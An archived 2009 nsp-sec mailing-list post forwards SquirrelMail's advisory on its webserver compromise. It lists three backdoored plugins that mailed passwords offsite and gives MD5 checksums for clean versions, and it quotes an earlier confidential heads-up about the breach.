[nsp-sec] [Confidential] Webmail issue.

Robert Lowe rlowe at auscert.org.au
Sun Aug 2 19:48:06 EDT 2009 

Hi all,

SquirrelMail have posted an update regarding this incident:

http://squirrelmail.org/index.php



SECURITY: SquirrelMail Webserver Compromise Update, and Plugin Status
Jul 31, 2009 by Jonathan Angliss
 	We apologies for the extended downtime for the SquirrelMail plugins
repository, and some of the SquirrelMail site documentation.

Plugins Compromise
During the initial announcement, we'd mentioned that we did not believe that
any of the plugins had been compromised. Further investigation has shown
that the following plugins were indeed compromised:

    * sasql-3.2.0
    * multilogin-2.4-1.2.9
    * change_pass-3.0-1.4.0


Parts of these code changes attempts to send mail to an offsite server
containing passwords. We cannot establish a timeline of when these plugins
were compromised. If you are a user of these plugins, it is strongly
recommended you download a fresh copy from the plugins repository. MD5s for
the good versions are below:

a492922e5b0d2245d4e9bc255a7c5755  sasql-3.2.0.tar.gz
b143f2dc82f9e98dd43c632855255075  multilogin-2.4-1.2.9.tar.gz
2cff7c5d4f6f5d8455683bb5d96bb9fe  change_pass-3.0-1.4.0.tar.gz

Plugins Availability
As of now, the plugins are available to download again. I personally
apologies for the extended outage of this, as I know some of you have been
eager to get these back up and running again. Once again, if you notice any
issues with the site, feel free to email.



Scott, thanks very much for the initial heads up - much appreciated.

Regards,
Rob.


> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
> bounces at puck.nether.net] On Behalf Of Scott A. McIntyre
> Sent: Wednesday, 17 June 2009 4:16 PM
> To: NSP-SEC List
> Subject: [nsp-sec] [Confidential] Webmail issue.
> 
> ----------- nsp-security Confidential --------
> 
> All,
> 
> I can't yet reveal all of the details and the information I'm about to
> share is for NSP-SEC *ONLY* - do not under any circumstances blog,
> tweet, MySpace, FriendIn, LinkedFace (whatever) or call Krebs about
> this.
> 
> There are strong indications that Squirrelmail.org has been
> compromised.  What was initially thought to be a SVN account
> compromise has shown to be root level system access.  Code has been
> changed, plugins modified, and the Apache httpd was interfered with to
> attempt to load a new (details still to come) module.
> 
> Backdoors were installed in various plugins.
> 
> The initial compromise was *thought* to be between 1400 and 1600 on 16
> June 2009 (UTC) but subsequent investigation shows it may have been
> going on for "a few weeks."
> 
> Details are still coming in, and are quite sketchy, but given the
> popularity of SquirrelMail within the NSP community as a customer-
> facing webmail package I wanted to give NSP-Sec a heads up on the
> matter.
> 
> As I know more definitive information, I'll share it with the
> community.
> 
> Regards,
> 
> Scott A. McIntyre
> XS4ALL Internet B.V.
> 
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________

More information about the nsp-security mailing list